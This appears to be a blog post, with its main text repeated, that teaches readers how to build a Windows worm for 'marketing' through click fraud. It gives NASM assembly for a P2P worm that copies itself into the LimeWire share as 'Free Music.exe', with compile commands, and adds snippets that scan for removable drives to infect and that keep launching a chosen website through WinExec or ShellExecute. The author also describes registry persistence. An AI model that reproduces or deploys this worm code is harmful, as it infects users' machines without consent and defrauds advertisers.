Marketing in the *new* age using virii and worms for profit
I have coded bots, worms, virii and anything I can wrap my head around
of them all biological worms and virii are unique. But this post is
not about biocode
am talking about marketing with bots, I have seen one bot that does
this but it has a stupid payload and attacks too strong. Anyway am
here to discuss and show how to market successfully with a virus/worm.
I guess if this becomes a good technique the corporate greeds will
legalize coding virii and worms \0/ for business purposes o_O lol.
You may wonder why is this necessary, well einstein; some of us are
programmers(aka nerds) and when we are done coding a cool project,
marketing it becomes a heck of a job especially when everything we say
is technical also when you want to make money with Google AdSense this
is a vey good option. may be considered click fraud but hey you showed
them and they clicked who's to blame the interested client or the
coder ^_^
The whole idea is infect a system copy self to windir PS: most virii
and worms meant to do some sought of public announcements or activism
target consumer OSes and the head is windows it doesn't mean we hate
windows it means; thats where all the *dull* brains are and we *need*
them to know something or arise from their silent slumber.
So as I was saying the idea is when our child first gets to a
compatible system in this case windows it must first copy itself to
the Windows Directory then maybe write a registry rule to make it run
first when the system boots run child2(the one in the windir) and exit
child1 from probably a flash drive. now you can Winexec your site
which will in windows fire up the default browser with the address you
supplied and the user sees magic hey there's a site here lets see or
they may close it but if it keeps poping up like a TV ad they will
give in believe me I have studied psychology :D
you may now infect other removable drives and exes to spread around
quickly you may also spread through p2p ^^
Here is code for a p2p worm in asm(NASM)
PS: I don't even have to show this only a
*fool* wouldn't know how to spread hehe.
fake db "C:\Progra~1\LimeWire\Free Music.exe", 0
This code is fully functional but not good :(
fake can be collect from many of the warez sites and stuff like
that. To compile in UNIX/Linux use
nasm -fwin32 lame_p2p.asm
./alink -oPE lame_p2p win32.lib -entry main
For the alink you can download the old version and port it or wait for
me to release my port which has some funny errors
alink.c:257: warning: sizeof(pointer) possibly incorrect in argument 3
This is because am using strlcpy with a pointer as size and also am
compiling with
cc -O2 -pipe -Wall -Werror -Wstrict-prototypes -c alink.c
if I take off -Werror -Wstrict-prototypes everything works fine I'll
think about releasing it like that or corrected :)
Anyway how to spread with removable drives I have all the code but I
don't want to copy and share :( I'll share when I perfect it.
a little snippet though
lol cool huh
ok so with that you get a lot of clicks and attention I think am tired
I'l continue later I think :D
oh I forgot the Winexec hehe
or if you want to use ShellExecute
Choose your weapon, Remember that writing these creatures(our children)
is an art so take time and don't make them hazardous
take them as you little army if you have ever taken Ninjutsu lessons
from a good *master* he trains you with discipline first spiritually
and physically code with passion and you will happy forever.
Happy hacking push that processor to the extreme :)
of them all biological worms and virii are unique. But this post is
not about biocode
am talking about marketing with bots, I have seen one bot that does
this but it has a stupid payload and attacks too strong. Anyway am
here to discuss and show how to market successfully with a virus/worm.
I guess if this becomes a good technique the corporate greeds will
legalize coding virii and worms \0/ for business purposes o_O lol.
You may wonder why is this necessary, well einstein; some of us are
programmers(aka nerds) and when we are done coding a cool project,
marketing it becomes a heck of a job especially when everything we say
is technical also when you want to make money with Google AdSense this
is a vey good option. may be considered click fraud but hey you showed
them and they clicked who's to blame the interested client or the
coder ^_^
The whole idea is infect a system copy self to windir PS: most virii
and worms meant to do some sought of public announcements or activism
target consumer OSes and the head is windows it doesn't mean we hate
windows it means; thats where all the *dull* brains are and we *need*
them to know something or arise from their silent slumber.
So as I was saying the idea is when our child first gets to a
compatible system in this case windows it must first copy itself to
the Windows Directory then maybe write a registry rule to make it run
first when the system boots run child2(the one in the windir) and exit
child1 from probably a flash drive. now you can Winexec your site
which will in windows fire up the default browser with the address you
supplied and the user sees magic hey there's a site here lets see or
they may close it but if it keeps poping up like a TV ad they will
give in believe me I have studied psychology :D
you may now infect other removable drives and exes to spread around
quickly you may also spread through p2p ^^
Here is code for a p2p worm in asm(NASM)
PS: I don't even have to show this only a
*fool* wouldn't know how to spread hehe.
;############################
; This is in asm(NASM) #
; compiled under OpenBSD4.6 #
; #
; lame p2p worm #
;############################
[bits 32]
[global main]
[extern CopyFileA]
[extern ExitProcess]
[extern GetModuleHandleA]
[extern GetModuleFileNameA]
[segment code public use32 class='CODE']
main:
call [lame]
lame:
pop ebp
sub ebp, [lame] ; w00t you don't know this << o_O
call [ebp+GetModuleHandleA]
push dword [ebp+szpath]
push dword eax
call [ebp+GetModuleFileNameA]
push dword 0x00000000
push dword [ebp+fake]
push dword [ebp+szpath]
call [ebp+CopyFileA]
push dword 0x00000000
call [ebp+ExitProcess]
[segment data public use32 class='DATA']
szpath db 0x00000000
times 0x00000100-$+szpath db 0 ; 256d
fake db "C:\Progra~1\LimeWire\Free Music.exe", 0
This code is fully functional but not good :(
fake can be collect from many of the warez sites and stuff like
that. To compile in UNIX/Linux use
nasm -fwin32 lame_p2p.asm
./alink -oPE lame_p2p win32.lib -entry main
For the alink you can download the old version and port it or wait for
me to release my port which has some funny errors
alink.c:257: warning: sizeof(pointer) possibly incorrect in argument 3
This is because am using strlcpy with a pointer as size and also am
compiling with
cc -O2 -pipe -Wall -Werror -Wstrict-prototypes -c alink.c
if I take off -Werror -Wstrict-prototypes everything works fine I'll
think about releasing it like that or corrected :)
Anyway how to spread with removable drives I have all the code but I
don't want to copy and share :( I'll share when I perfect it.
a little snippet though
...
mov word [ebp+szletter], 0x00000041 ; letter 'A'
seekem:
mov ecx, dword [ebp+szletter]
mov byte [ebp+szdrv], cl ; lol nice eh?
push dword [ebp+szdrv]
call [ebp+GetDriveTypeA]
cmp eax, DRIVE_REMOVABLE
je eatit ; All removable Drives are mine
inc dword [ebp+szletter]
cmp word [ebp+szletter], 0x0000005a ; letter 'Z'
jg sleep_alil ; should be sleep drives come and
; go u know :) Update:2010/06/15
; now we sleep hehe
jmp seekem
sleep_alil:
push 0x00000014 ; 20 seconds ^^
call [ebp+Sleep]
jmp seekem ; get back to work you idio
; Heres where you infect
eatit:
...
lol cool huh
ok so with that you get a lot of clicks and attention I think am tired
I'l continue later I think :D
oh I forgot the Winexec hehe
push dword 0x00000005 ; SW_SHOW
push dword [ebp+sitename] ; eg http://www.google.com
call [ebp+Winexec]or if you want to use ShellExecute
push dword 0x00000005 ; SW_SHOW hehe
push dword 0x00000000 ; [directory] not needed
push dword 0x00000000 ; [parameters] not needed
push dword [ebp+sitename] ; [sitename] eg http://www.google.com
push dword 0x00000000 ;
push dword 0x00000000 ; [hwnd]
call [ebp+ShellExecute]Choose your weapon, Remember that writing these creatures(our children)
is an art so take time and don't make them hazardous
take them as you little army if you have ever taken Ninjutsu lessons
from a good *master* he trains you with discipline first spiritually
and physically code with passion and you will happy forever.
Happy hacking push that processor to the extreme :)
Comments
Post a Comment